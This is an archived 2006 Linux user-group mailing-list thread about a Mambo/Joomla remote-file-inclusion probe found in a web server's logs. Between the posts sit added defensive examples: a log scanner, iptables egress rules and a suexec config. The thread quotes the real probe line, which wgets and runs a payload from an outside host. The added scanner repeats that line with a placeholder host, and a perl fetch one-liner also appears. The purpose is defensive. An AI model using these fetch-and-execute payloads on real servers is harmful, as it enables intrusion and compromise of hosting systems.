Re: [SLUG] d/l illicit files: wget, curl, what else ?
On Sat, September 30, 2006 7:40 am, Zhasper wrote:

> On 9/29/06, Voytek Eymont [EMAIL PROTECTED] wrote:
>
> Eeep! You're close, only off by three years:
> http://www.auscert.org.au/render.html?it=3689
>
> Red Hat Linux 7.1, 7.2, 7.3, and 8.0 distributions will reach their end-of-life for errata maintenance on the 31st December 2003. This means

yes, but it was picked up by the fedora organization:

Maintenance Mode Fedora Releases

We are currently maintaining Red Hat Linux 7.3 and 9 as well as Fedora Core 3 and 4 as these have been transferred into maintenance mode from Fedora Core. We will provide updates for these releases for as long as there is community interest though we in general follow the 1-2-3 and out policy. This provides an effective supported lifetime (Fedora Core plus Fedora Legacy Support) of approximately 1.5 years or even more.

--
Voytek

--
SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/
Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On Thu, September 28, 2006 8:40 am, Erik de Castro Lopo wrote:

> On Thu, 28 Sep 2006 08:33:47 +1000 (EST) Voytek Eymont [EMAIL PROTECTED] wrote:
>
> No, it won't. You need to run this in a chroot jail or a User Mode Linux or something like that.
>
> You would be better off making sure your machine is running a current version of your chosen distro (what are you running btw?) and then exploring chroot/UML/Xen/whatever solutions.

thanks, Erik

RH7.3

I suspect some of the solutions discussed might not be available for it...

--
Voytek
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On Thu, September 28, 2006 8:42 am, Zhasper wrote:

> On 9/28/06, Voytek Eymont [EMAIL PROTECTED] wrote:
>
> I'd suggest that a more effective strategy might be to talk to your users; tell them what you've found, why it's unacceptable, and what action you'll be taking if you discover anything similar in future. Also make it clear to them how they can check things with you before they install, and be proactive in helping them find solutions that don't compromise your security - for instance, sticking phpmyadmin behind a .htaccess file.

thanks, Zhasper

yes, I will, clearly, I need to spell it out, it's obvious I overestimated users' grasp of security, etc., or, in fact, his ability to understand what's good and proper: a php shell script the user installed had a clear warning 'do not place this on your server without admin's permission'

--
Voytek
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On Thu, September 28, 2006 10:32 am, Matthew Hannigan wrote:

> On Thu, Sep 28, 2006 at 08:40:38AM +1000, Erik de Castro Lopo wrote:
>
> I wonder if the best bang for buck is perhaps just have an iptables rule to prevent outgoing connections for the user running apache.

Matt, thanks

this seems like a worthwhile option... is it ?

--
Voytek
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On Thu, September 28, 2006 11:45 am, Jamie Wilkinson wrote:

> This one time, at band camp, Erik de Castro Lopo wrote:
>
> You can add yourself the overhead of Xen for a shared hosting environment, but it's not necessary when you take the time to use a simple privilege separation technique, e.g. mod_suexec.

is there anything like it for Apache 1.3x ?

--
Voytek
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On Fri, September 29, 2006 11:02 pm, Erik de Castro Lopo wrote:

> You mean like up-to-date security patches? :-)

I thought they're doing it till end of this year for 7.3...?

--
Voytek
Re: [SLUG] d/l illicit files: wget, curl, what else ?
Voytek Eymont wrote:

> On Thu, September 28, 2006 8:40 am, Erik de Castro Lopo wrote:
>
>> You would be better off making sure your machine is running a current version of your chosen distro (what are you running btw?)
>
> thanks, Erik
>
> RH7.3
>
> I suspect some of the solutions discussed might not be available for it...

You mean like up-to-date security patches? :-)

Erik
--
+---+ Erik de Castro Lopo +---+
Microsoft, and other companies with shoddy security, . -- Bruce Schneier, crypto-guru, to a US Senate committee.
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On 9/29/06, Voytek Eymont [EMAIL PROTECTED] wrote:

> On Fri, September 29, 2006 11:02 pm, Erik de Castro Lopo wrote:
>
>> You mean like up-to-date security patches? :-)
>
> I thought they're doing it till end of this year for 7.3...?

Eeep! You're close, only off by three years:
http://www.auscert.org.au/render.html?it=3689

Red Hat Linux 7.1, 7.2, 7.3, and 8.0 distributions will reach their end-of-life for errata maintenance on the 31st December 2003. This means that from 1st January 2004 we will not be producing new security, bugfix, or enhancement updates for these products. Red Hat Linux 9 reaches end of life on April 30, 2004.

--
There is nothing more worthy of contempt than a man who quotes himself - Zhasper, 2004
Re: [SLUG] d/l illicit files: wget, curl, what else ?
Voytek Eymont wrote:

> apart from wget and curl, what else can be used to download illicit files to a web server ?

Python, Perl, Ruby, C, Haskell, Ocaml. In fact any programming language. Also programs like lynx.

Erik
--
+---+ Erik de Castro Lopo +---+
There is no reason why anyone would want a computer in their home
Ken Olson, DEC, 1977
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On Wed, Sep 27, 2006 at 08:54:04PM +1000, Voytek Eymont wrote:

> apart from wget and curl, what else can be used to download illicit files to a web server ?
>
> what other stuff should I look for in the web logs ?
>
> from web log:
>
> GET /index.php?_REQUEST[option]=com_content_REQUEST[Itemid]=1GLOBALS=mosConfig_absolute_path=http://www.sohbetbitanem.com/tool.gif?cmd=cd%20/tmp/;wget%20http://www.sohbetbitanem.com/mambo.txt;mambo%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0 200 167 - Mozilla/5.0

This web request appears to be an attempt to exploit a vulnerability in a CMS called Mambo. The top hit on google for mosConfig_absolute_path is: http://secunia.com/advisories/14337. See also http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0512.

It's probably just an automated attempt to find and exploit hosts with the vulnerable version of Mambo. If you don't have a vulnerable version of Mambo installed on your server, then you probably don't have anything to worry about.

-Andrew.
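Voytek asked what else to look for in the web logs; the probe Andrew identifies has a stable shape (a query string pointing mosConfig_absolute_path at a remote URL, with the fetch commands URL-encoded after cmd=), so it can be picked out of an access log mechanically. The script below is an added example, not code from the thread: it scans combined-format Apache log lines for that pattern and reports the client address and the command names the injected string would have run. The three log lines are constructed samples modelled on the one Voytek posted, and attacker.example is a placeholder host; the URL decoder handles only the handful of escapes this probe family uses.

```shell
#!/bin/sh
# Added example, not code from the SLUG thread: scan an Apache access log for
# the Mambo/Joomla remote-file-inclusion probe (mosConfig_absolute_path set to
# a remote URL, CVE-2005-0512) and report which commands the injected string
# tried to run.  Sample lines are constructed; attacker.example is a placeholder.

SAMPLE_LOG='10.0.0.1 - - [27/Sep/2006:20:10:01 +1000] "GET /index.php?option=com_content&Itemid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.2 - - [27/Sep/2006:20:11:44 +1000] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://attacker.example/tool.gif?cmd=cd%20/tmp/;wget%20http://attacker.example/mambo.txt;mambo%20mambo.txt;rm%20-rf%20mambo.* HTTP/1.0" 200 167 "-" "Mozilla/5.0"
10.0.0.3 - - [27/Sep/2006:20:12:09 +1000] "GET /index.php?mosConfig_absolute_path=/var/www/html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"'

# Decode the URL escapes that matter for reading an injected shell string.
# Partial on purpose: only these escapes are handled, which is enough for this
# probe family; a full %XX decoder needs bash printf or a real language.
urldecode() {
    sed -e 's/+/ /g' -e 's/%20/ /g' -e 's/%3[Bb]/;/g' -e 's/%2[Ff]/\//g' \
        -e 's/%26/\&/g' -e 's/%3[Dd]/=/g' -e 's/%7[Cc]/|/g'
}

# True when the line's query string points mosConfig_absolute_path at a remote
# URL.  A local path (third sample line) is not the remote-inclusion pattern.
is_rfi_probe() {
    printf '%s\n' "$1" | grep -qi 'mosConfig_absolute_path=http[s]*://'
}

# Pull the request URL out of one combined-format log line and decode it.
decoded_url() {
    req=$(printf '%s\n' "$1" | sed -e 's/^[^"]*"//' -e 's/".*$//')
    url=${req#* }            # drop the method
    url=${url% HTTP/*}       # drop the protocol version
    printf '%s\n' "$url" | urldecode
}

# Given a decoded URL, list the first word of each ';'-separated command after
# cmd=, e.g. "cd wget mambo rm" for the sample probe.  Fails if there is no cmd=.
injected_commands() {
    case $1 in
        *cmd=*) ;;
        *) return 1 ;;
    esac
    printf '%s\n' "${1#*cmd=}" | tr ';' '\n' |
        awk 'NF { printf "%s%s", (n++ ? " " : ""), $1 } END { print "" }'
}

# Read log lines on stdin; emit "<client ip><TAB><commands><TAB><decoded url>"
# per probe, which is the record you would feed to a blocklist or an alert.
scan_log() {
    while IFS= read -r line; do
        is_rfi_probe "$line" || continue
        url=$(decoded_url "$line")
        cmds=$(injected_commands "$url" || echo '-')
        printf '%s\t%s\t%s\n' "${line%% *}" "$cmds" "$url"
    done
}

# Stand-alone use: ./scan.sh /var/log/httpd/access_log, or no argument to run
# against the constructed sample.
if [ -n "${1-}" ]; then
    scan_log < "$1"
else
    printf '%s\n' "$SAMPLE_LOG" | scan_log
fi
```

The third sample line is there deliberately: a mosConfig_absolute_path parameter with a local value is noise from scanners and misconfigured clients, and matching on the bare parameter name would bury the one line that matters. A 200 status on the probe line, as in the thread's log, tells you nothing on its own; whether the include actually ran depends on the installed version, which is why the follow-up is to check the CMS version rather than the log.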
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On Wed, September 27, 2006 9:15 pm, Erik de Castro Lopo wrote:

>> apart from wget and curl, what else can be used to download illicit files to a web server ?
>
> Python, Perl, Ruby, C, Haskell, Ocaml. In fact any programming language. Also programs like lynx.

Eric,

I guess I meant 'single-purpose utilities that can be easily exploited like so':

'some_app file_url'

through a web server vulnerability to easily deposit exploits

I'm guessing that if I do NOT have wget/curl/lynx/links available, next time a cms has such an exploitable hole, I'll reduce my exposure, no ??

if I remove or rename wget/curl/lynx/links from my server, apart from occasional inconvenience to me, that won't cause me issues ?

--
Voytek
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On Thu, September 28, 2006 12:18 am, Andrew Bennetts wrote:

> This web request appears to be an attempt to exploit a vulnerability in a CMS called Mambo. The top hit on google for mosConfig_absolute_path is: http://secunia.com/advisories/14337. See also http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0512.
>
> It's probably just an automated attempt to find and exploit hosts with the vulnerable version of Mambo. If you don't have a vulnerable version of Mambo installed on your server, then you probably don't have anything to worry about.

thanks, Andrew

unfortunately, it seems my user does have a vulnerable version of Joomla... clearly he is not following Mambo/Joomla advisories...

I know little of Mambo/Joomla, any idea how I can find out the level of the installed version ?

--
Voytek
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On Thu, 28 Sep 2006 08:33:47 +1000 (EST) Voytek Eymont [EMAIL PROTECTED] wrote:

> Eric,

Who's this Eric guy? :-)

> I guess I meant 'single-purpose utilities that can be easily exploited like so':
>
> 'some_app file_url'
>
> through a web server vulnerability to easily deposit exploits

In Perl, Python and Ruby writing a simple app that does what wget does is no more than 10 lines of really trivial code.

> I'm guessing that if I do NOT have wget/curl/lynx/links available, next time a cms has such an exploitable hole, I'll reduce my exposure, no ??

No, it won't. You need to run this in a chroot jail or a User Mode Linux or something like that.

> if I remove or rename wget/curl/lynx/links from my server, apart from occasional inconvenience to me, that won't cause me issues ?

It goes such a small way to solving the problem that it's probably not worth it. You would be better off making sure your machine is running a current version of your chosen distro (what are you running btw?) and then exploring chroot/UML/Xen/whatever solutions.

Erik
--
+---+ Erik de Castro Lopo +---+
Microsoft is finally bringing all of its Windows operating system families under one roof. It will combine all of the features of CE, stability and support of ME and the speed of NT. It will be called Windows CEMENT...
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On 9/28/06, Voytek Eymont [EMAIL PROTECTED] wrote:

> On Wed, September 27, 2006 9:15 pm, Erik de Castro Lopo wrote:
>
>>> apart from wget and curl, what else can be used to download illicit files to a web server ?
>>
>> Python, Perl, Ruby, C, Haskell, Ocaml. In fact any programming language. Also programs like lynx.
>
> Eric,
>
> I guess I meant 'single-purpose utilities that can be easily exploited like so':
>
> 'some_app file_url'
>
> through a web server vulnerability to easily deposit exploits
>
> I'm guessing that if I do NOT have wget/curl/lynx/links available, next time a cms has such an exploitable hole, I'll reduce my exposure, no ??

I would think that depended entirely on the exploitable hole; even if you get rid of those utilities, there will be ways within perl/php/language-of-choice to download things; if the exploitable hole makes those available, you're no better off for having removed those utilities.

> if I remove or rename wget/curl/lynx/links from my server, apart from occasional inconvenience to me, that won't cause me issues ?

I think it would cause more inconvenience than you realise. I'm not sure what Apt or up2date use, but I know that utilities such as CPAN will try to use wget/curl/links/lynx in order to download updates; you'll probably find that a lot of other systems that have the ability to look for updates do as well.

Essentially, I think you're making the same mistake here that Bruce Schneier writes about airline security people making all the time: you're reacting specifically to one attack vector that you've seen in the past, which means that that vector won't be successful again. You're not doing anything to prevent different vectors from being detected or prevented though.

I'd suggest that a more effective strategy might be to talk to your users; tell them what you've found, why it's unacceptable, and what action you'll be taking if you discover anything similar in future. Also make it clear to them how they can check things with you before they install, and be proactive in helping them find solutions that don't compromise your security - for instance, sticking phpmyadmin behind a .htaccess file.

--
There is nothing more worthy of contempt than a man who quotes himself - Zhasper, 2004
Re: [SLUG] d/l illicit files: wget, curl, what else ?
Voytek Eymont wrote:

> thanks, Andrew
>
> unfortunately, it seems my user does have a vulnerable version of Joomla... clearly he is not following Mambo/Joomla advisories...

If you allow your users to install their own versions of X, then your distribution's patching mechanism is bypassed and you have no way of easily keeping up to date with patches.

One way of dealing with this is to make each user run in a chroot/UML/Xen/whatever instance so that when their environment is compromised it only affects them and not everyone else on the machine.

Erik
--
+---+ Erik de Castro Lopo +---+
Hundreds of thousands of people couldn't care less about Kylix and what it runs on. It's there for the dying breed of die-hard Pascal fanatics who missed their 20 year window to migrate to C and C++. -- Kaz Kylheku in comp.os.linux.development.apps
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On Thu, Sep 28, 2006 at 08:40:38AM +1000, Erik de Castro Lopo wrote:

> [ .. ]
>
>> if I remove or rename wget/curl/lynx/links from my server, apart from occasional inconvenience to me, that won't cause me issues ?
>
> It goes such a small way to solving the problem that it's probably not worth it. You would be better off making sure your machine is running a current version of your chosen distro (what are you running btw?) and then exploring chroot/UML/Xen/whatever solutions.

I wonder if the best bang for buck is perhaps just have an iptables rule to prevent outgoing connections for the user running apache. Or will this potentially kill those new fancy schmancy ajax/web2 apps.

Matt
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On 9/28/06, Matthew Hannigan [EMAIL PROTECTED] wrote:

> I wonder if the best bang for buck is perhaps just have an iptables rule to prevent outgoing connections for the user running apache. Or will this potentially kill those new fancy schmancy ajax/web2 apps.

It won't kill anything ajaxified, as those things still rely on the browser opening connections to the server.

--
There is nothing more worthy of contempt than a man who quotes himself - Zhasper, 2004
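Matt's per-user egress rule and Zhasper's answer about Ajax fit together in one ruleset, and the detail that makes the difference is rule order. The script below is an added example, not code from the thread: it prints (and, as root with --apply, installs) an iptables OUTPUT policy that refuses new outbound connections from the Apache user while letting replies on browser-initiated connections through. It assumes httpd runs as the user "apache" (the Red Hat/Fedora default, overridable with APACHE_USER), that the server needs DNS and loopback (local MySQL), and that APACHE_EGRESS is a chain name of our own choosing.

```shell
#!/bin/sh
# Added example, not code from the SLUG thread: iptables egress policy for the
# Apache user.  Dry run by default; "--apply" as root installs the rules.
# Assumptions: httpd runs as $APACHE_USER ("apache" unless overridden), it needs
# DNS and anything on loopback, and APACHE_EGRESS is our own chain name.

APACHE_USER=${APACHE_USER:-apache}
CHAIN=APACHE_EGRESS

# Print the rules in the order they must be installed.  The order is the
# point: packets on already-accepted inbound connections are also "owned" by
# the apache uid, so the ESTABLISHED,RELATED accept has to come before the
# REJECT or every response to a browser would be rejected.  LOG before REJECT
# gives you a syslog line per blocked wget/curl/perl attempt instead of
# silence, and REJECT (rather than DROP) makes the attacker's fetch fail fast
# rather than tie up an httpd child until it times out.
egress_rules() {
    cat <<EOF
iptables -N $CHAIN
iptables -A $CHAIN -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A $CHAIN -o lo -j ACCEPT
iptables -A $CHAIN -p udp --dport 53 -j ACCEPT
iptables -A $CHAIN -p tcp --dport 53 -j ACCEPT
iptables -A $CHAIN -m limit --limit 10/min -j LOG --log-prefix "$CHAIN: "
iptables -A $CHAIN -j REJECT
iptables -A OUTPUT -m owner --uid-owner $APACHE_USER -j $CHAIN
EOF
}

# 1-based position of the first rule containing $1, or 0 if none; used to
# check the ordering invariant before anything is applied.
rule_index() {
    n=$(egress_rules | grep -n -- "$1" | head -n 1 | cut -d: -f1)
    printf '%s\n' "${n:-0}"
}

# True when the ACCEPT for established traffic precedes the REJECT.
rules_are_ordered() {
    [ "$(rule_index ESTABLISHED)" -gt 0 ] &&
    [ "$(rule_index ESTABLISHED)" -lt "$(rule_index ' -j REJECT')" ]
}

case ${1-} in
    --apply)
        [ "$(id -u)" -eq 0 ] || { echo "--apply needs root" >&2; exit 1; }
        rules_are_ordered || { echo "rule order check failed" >&2; exit 1; }
        egress_rules | sh -e
        ;;
    *)
        egress_rules          # dry run: show what --apply would execute
        ;;
esac
```

Anything the site legitimately initiates from the server side (a payment gateway, a feed the CMS fetches) needs its own ACCEPT rule placed before the LOG/REJECT pair, which is also the inventory you want to have written down. The "APACHE_EGRESS:" prefix in syslog is the detection signal Voytek was asking for in the logs: a line there means something running as the web server tried to reach out, which on a static-content host should never happen.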
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On Thu, September 28, 2006 8:42 am, Zhasper wrote:

> On 9/28/06, Voytek Eymont [EMAIL PROTECTED] wrote:
>
> Essentially, I think you're making the same mistake here that Bruce Schneier writes about airline security people making all the time: you're reacting specifically to one attack vector that you've seen in the past, which means that that vector won't be successful again. You're not doing anything to prevent different vectors from being detected or prevented though.

yes, I realize that, though, I feel it's still better to 'do something'

> I'd suggest that a more effective strategy might be to talk to your users; tell them what you've found, why it's unacceptable, and what action you'll be taking if you discover anything similar in future. Also make it clear to them how they can check things with you before they install, and be proactive in helping them find solutions that don't compromise your security - for instance, sticking phpmyadmin behind a .htaccess file.

yes, of course, though, it's clear this user's apparent skills don't extend to security consideration...

--
Voytek
Re: [SLUG] d/l illicit files: wget, curl, what else ?
This one time, at band camp, Voytek Eymont wrote:

> On Wed, September 27, 2006 9:15 pm, Erik de Castro Lopo wrote:
>
>>> apart from wget and curl, what else can be used to download illicit files to a web server ?
>>
>> Python, Perl, Ruby, C, Haskell, Ocaml. In fact any programming language. Also programs like lynx.
>
> Eric,
>
> I guess I meant 'single-purpose utilities that can be easily exploited like so':
>
> 'some_app file_url'
>
> through a web server vulnerability to easily deposit exploits
>
> I'm guessing that if I do NOT have wget/curl/lynx/links available, next time a cms has such an exploitable hole, I'll reduce my exposure, no ??

perl -MLWP -e 'GET url' or somesuch :) You want to remove perl too?

Configuring apache to run the potentially vulnerable code in a security domain with minimum rights is going to let you sleep better than removing random tools. Sure, minimise the options an attacker has, defense in depth and all that. Start at the bottom of the network stack and start securing yourself from there, then up through the application layer, then once you're inside the application itself, partition execution contexts so that the stuff you don't trust (i.e. the CMS) when hacked doesn't have the opportunity to damage your system, then they'll pop up like sore thumbs when it does happen, and make for easier analysis of attack vector.
Re: [SLUG] d/l illicit files: wget, curl, what else ?
This one time, at band camp, Erik de Castro Lopo wrote:

> Voytek Eymont wrote:
>
>> thanks, Andrew
>>
>> unfortunately, it seems my user does have a vulnerable version of Joomla... clearly he is not following Mambo/Joomla advisories...
>
> If you allow your users to install their own versions of X, then your distribution's patching mechanism is bypassed and you have no way of easily keeping up to date with patches.
>
> One way of dealing with this is to make each user run in a chroot/UML/Xen/whatever instance so that when their environment is compromised it only affects them and not everyone else on the machine.

chroot/UML/Xen is not the hammer for this screw :)

Anchor has survived for 6 years without a root compromise, allowing customers to install their own buggy unpatched versions of code, and all running on an unvirtualised machine. You can add yourself the overhead of Xen for a shared hosting environment, but it's not necessary when you take the time to use a simple privilege separation technique, e.g. mod_suexec.
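What the suexec separation Jamie describes looks like in practice, and the catch that matters for a PHP CMS, is shown in the vhost below. It is an added example, not the thread's or Anchor's configuration: one virtual host per customer, with the customer's code executed under that customer's own uid/gid. The hostname, paths and the "customer1" account are placeholders; the Apache 1.3 note answers Voytek's question about that version.

```apache
# Added example; not the thread's or Anchor's configuration.  One vhost per
# customer, everything the vhost executes running as that customer's own
# uid/gid through suexec.  Names, paths and "customer1" are placeholders.
<VirtualHost *:80>
    ServerName customer1.example
    DocumentRoot /home/customer1/public_html

    # Apache 2.x: the uid/gid suexec switches to for this vhost.  Apache 1.3
    # expressed the same thing with User/Group directives inside <VirtualHost>.
    SuexecUserGroup customer1 customer1

    # suexec only covers CGI/SSI.  mod_php runs inside httpd as the apache user
    # and is NOT separated, so PHP has to run as a CGI binary through the
    # wrapper for a compromised CMS to be confined to this customer's files.
    ScriptAlias /php-bin/ /home/customer1/cgi-bin/
    Action php-cgi-handler /php-bin/php-cgi
    AddHandler php-cgi-handler .php

    <Directory /home/customer1/public_html>
        Options -Indexes
        # AuthConfig is what lets the customer put phpmyadmin behind .htaccess.
        AllowOverride AuthConfig Limit
    </Directory>
</VirtualHost>
```

The wrapper refuses to run anything that fails its compiled-in checks (target uid above the minimum, script under the document root suexec was built with, owned by the target user and not group- or world-writable), and when a customer's page suddenly 500s, suexec_log rather than error_log is where the reason is written; `suexec -V` prints the compiled-in settings to compare against. The payoff is the one Jamie names: a hole in customer1's Joomla hands the attacker customer1's files and nothing else, and an unexpected process running as that uid is easy to spot.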
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On 28 Sep 2006, Jamie Wilkinson [EMAIL PROTECTED] wrote:

> This one time, at band camp, Voytek Eymont wrote:
>
>> On Wed, September 27, 2006 9:15 pm, Erik de Castro Lopo wrote:
>>
>>>> apart from wget and curl, what else can be used to download illicit files to a web server ?
>>>
>>> Python, Perl, Ruby, C, Haskell, Ocaml. In fact any programming language. Also programs like lynx.
>>
>> Eric,
>>
>> I guess I meant 'single-purpose utilities that can be easily exploited like so':
>>
>> 'some_app file_url'
>>
>> through a web server vulnerability to easily deposit exploits
>>
>> I'm guessing that if I do NOT have wget/curl/lynx/links available, next time a cms has such an exploitable hole, I'll reduce my exposure, no ??

Voytek,

Perhaps it's just me but I don't understand *where* and *by whom* you are trying to prevent them being executed. You can't (obviously) control what is run by random people on the internet who are attacking your machine. You can try to filter by the User-Agent string to block requests from those programs, but that is trivial to spoof, and regularly spoofed by attack tools. See e.g. http://www.metasploit.com/

If an attacker has control of your machine you have more serious problems than whether they can run wget or not. Similarly if your users are running vulnerable software you should just fix that rather than worrying about wget...

> perl -MLWP -e 'GET url' or somesuch :) You want to remove perl too?

And in php something like open('http://ubuntu.com/') may work too, depending on the configuration.

--
Martin
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On Thu, Sep 28, 2006 at 11:45:17AM +1000, Jamie Wilkinson wrote:

> You can add yourself the overhead of Xen for a shared hosting environment, but it's not necessary when you take the time to use a simple privilege separation technique, e.g. mod_suexec.

Speaking of mods, http://www.modsecurity.org/ might well prevent a lot of badness. I don't know whether the administration involved in a complex ISP hosting situation would be worth it though.

(me googles)

in http://www.cerias.purdue.edu/weblogs/coj/secure-it-practices/post-37/ Ed Finkler says:

mod_security is an essential tool for securing any apache-based hosting environment

So who am I to argue :-)

FWIW, there's also a post on this Mambo/Joomla worm: http://www.cerias.purdue.edu/weblogs/coj/infosec-education/post-11/

Matt